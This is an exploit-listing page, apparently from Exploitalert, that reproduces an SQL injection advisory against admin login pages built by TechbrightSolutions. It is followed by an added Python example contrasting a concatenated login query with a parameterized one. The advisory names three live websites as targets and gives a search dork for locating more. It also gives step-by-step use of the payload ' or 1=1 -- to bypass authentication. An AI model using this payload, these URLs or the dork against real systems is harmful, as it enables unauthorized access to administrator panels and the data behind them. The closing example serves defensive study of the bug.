Techbrightsolutions - Sql Injection/Admin Panel Bypass

CVE: N/A
Category: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2024-02-02
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020010

Below is a copy:

TITLE: Techbrightsolutions - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: TechbrightSolutions
# Vulnerable URL: /Admin/login.aspx
# Dork: "by TechbrightSolutions" "login"
# Vulnerability Type: SQL Bypass
# Severity: Critical

Vulnerability Description:
During a recent penetration test conducted by TechbrightSolutions, a critical SQL injection vulnerability was discovered in the Admin Panel login functionality of TechbrightSolutions' application code. The vulnerability allows an attacker to bypass authentication controls and execute arbitrary SQL queries, potentially leading to unauthorized access and data compromise.

Proof of Concept (PoC):
URLs:
- http://kolencheryfamilytrust.org/Admin/login.aspx
- http://vivacards.in/Admin/AdminLogin.aspx
- https://globaljobs24.com/AdminLogin.aspx

1. Visit the admin login page, typically located at: http://kolencheryfamilytrust.org/Admin/login.aspx
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.

Contact
Telegram: @rootninext
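
The advisory does not show the server-side code, so the following is an added example (not from the advisory or the vendor) that reconstructs the CWE-89 bug class it describes and the fix. It assumes a login query built by string concatenation; the table, account, function names and the use of Python with in-memory SQLite are all constructed for illustration.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-salt"  # constructed value; use a random per-user salt in practice


def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db():
    # Constructed sample data: a single admin account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)", ("admin", pw_hash("S3cret-example")))
    return db


def login_vulnerable(db, username, password):
    # Assumed bug pattern: the username is concatenated into the SQL text, so a
    # quote closes the string literal and the rest of the input is parsed as SQL.
    # Hashing the password does not help, because the comment marker in the
    # username removes the password condition from the query entirely.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username, password):
    # The username is bound as a parameter, so it is only ever compared as data.
    row = db.execute("SELECT pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # The credential check happens in application code, in constant time.
    return hmac.compare_digest(row[0], pw_hash(password))


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"  # the input quoted in the advisory
    print("vulnerable, advisory input:", login_vulnerable(db, payload, payload))
    print("hardened,   advisory input:", login_hardened(db, payload, payload))
    print("hardened,   real password: ", login_hardened(db, "admin", "S3cret-example"))
```

On an ASP.NET application the same fix is a parameterized command (for example SqlCommand with SqlParameter values when the backend is SQL Server) in place of a concatenated query string.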

Copyright ©2024 Exploitalert.
